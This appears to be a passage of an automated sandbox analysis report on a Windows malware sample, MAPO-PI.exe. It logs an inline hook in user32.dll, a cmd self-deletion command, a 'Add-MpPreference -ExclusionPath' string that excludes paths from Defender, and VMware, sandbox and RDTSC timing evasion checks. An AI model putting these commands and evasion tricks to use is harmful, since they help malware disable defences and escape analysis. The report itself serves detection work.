          Source: 3.0.MAPO-PI.exe.eb0000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.9.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_004170AC push eax; retf
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00417A47 push edx; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0040ED75 push 00000051h; retf
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03047A47 push edx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_030470AC push eax; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CF5C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEFB push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0303ED75 push 00000051h; retf

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEA
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.25fd0c0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MAPO-PI.exe PID: 3868, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000030398E4 second address: 00000000030398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000003039B4E second address: 0000000003039B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 1752Thread sleep time: -43348s >= -30000s
          Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 2952Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1552Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4856Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6932Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5905
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2572
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exeThread delayed: delay time: 43348
          Source: C:\Users\user\Desktop\MAPO-PI.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.278762456.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.273464193.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.272236107.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.258291932.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00409A80 rdtsc
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019169A6 mov eax, dword ptr fs:[00000030h]
